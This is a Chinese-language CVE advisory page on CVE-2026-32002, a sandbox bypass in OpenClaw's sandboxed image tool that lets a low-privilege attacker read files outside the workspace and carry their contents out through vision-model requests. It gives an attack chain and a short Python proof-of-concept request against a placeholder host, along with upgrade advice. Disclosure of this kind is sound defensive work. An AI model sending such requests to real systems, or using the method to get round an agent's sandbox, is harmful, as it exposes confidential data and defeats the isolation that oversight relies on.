CVE-2026-32002 CVSS 5.3 中危

CVE-2026-32002 OpenClaw沙箱绕过漏洞

披露日期: 2026-03-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32002

漏洞类型

沙箱绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.2.23之前版本存在沙箱绕过漏洞。由于沙箱化图像工具未能对挂载路径强制执行工作区限制，攻击者可利用此漏洞读取工作区外的文件，绕过机密性控制。

技术细节

该漏洞的根源在于OpenClaw沙箱环境中的路径验证机制失效。具体来说，沙箱化图像工具在处理挂载路径时，未严格校验`tools.fs.workspaceOnly`规则，导致攻击者能够引用工作区之外的挂载文件。利用过程中，攻击者发送恶意请求指定受限路径，诱导图像工具加载该文件。随后，通过视觉模型提供商的解析功能，将文件内容通过视觉请求外带，从而绕过沙箱的隔离机制，造成数据泄露。

攻击链分析

STEP 1

1. 访问获取

攻击者获取OpenClaw实例的低权限访问权限（PR:L）。

STEP 2

2. 路径遍历

攻击者向沙箱化图像工具发送请求，指定工作区外的挂载路径（如受限文件），绕过workspaceOnly检查。

STEP 3

3. 数据外带

工具加载图像后，利用视觉模型提供商请求处理图像，将文件内容通过响应返回给攻击者。

STEP 4

4. 信息泄露

攻击者接收到响应，成功获取工作区之外的敏感文件内容。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Concept for CVE-2026-32002
# Bypass OpenClaw workspaceOnly restriction via image tool

target = "http://vulnerable-openclaw/api/execute"

# The malicious path outside the designated workspace
bypass_path = "/mnt/data/restricted_config.png"

payload = {
    "tool": "image_analyzer",
    "parameters": {
        "file_path": bypass_path,
        "action": "extract_text"
    }
}

try:
    r = requests.post(target, json=payload)
    if r.status_code == 200:
        print("[+] Exploit successful! Data exfiltrated:")
        print(r.text)
    else:
        print("[-] Exploit failed")
except Exception as e:
    print(f"Error: {e}")

影响范围

OpenClaw < 2026.2.23

防御指南

临时缓解措施

建议立即升级OpenClaw至2026.2.23或更高版本以修复此漏洞。若无法升级，请暂时禁用受影响的图像工具功能或严格限制网络访问，防止未经授权的文件读取。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表